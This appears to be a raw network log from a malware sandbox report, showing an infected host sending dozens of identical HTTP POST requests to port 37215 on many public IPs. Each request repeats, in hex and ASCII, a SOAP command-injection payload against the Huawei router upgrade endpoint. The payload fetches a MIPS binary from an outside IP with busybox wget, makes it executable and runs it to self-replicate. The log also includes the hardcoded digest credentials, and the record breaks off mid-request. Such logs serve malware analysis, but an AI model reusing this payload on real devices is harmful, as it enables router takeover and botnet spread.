69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  371192.168.2.136003242.83.184.837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231467009 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  372192.168.2.134869841.64.88.15437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231484890 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  373192.168.2.1334062197.246.126.11937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231504917 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  374192.168.2.133578841.70.31.24037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231528997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  375192.168.2.1338784157.169.244.9537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231542110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  376192.168.2.1356614157.131.115.22437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231563091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  377192.168.2.1337688157.136.24.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231579065 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  378192.168.2.13567422.77.255.7737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231950998 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  379192.168.2.133657241.203.193.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231966019 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  380192.168.2.1356770197.51.151.7237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.231987953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  381192.168.2.1337264137.42.101.14237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.232012987 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
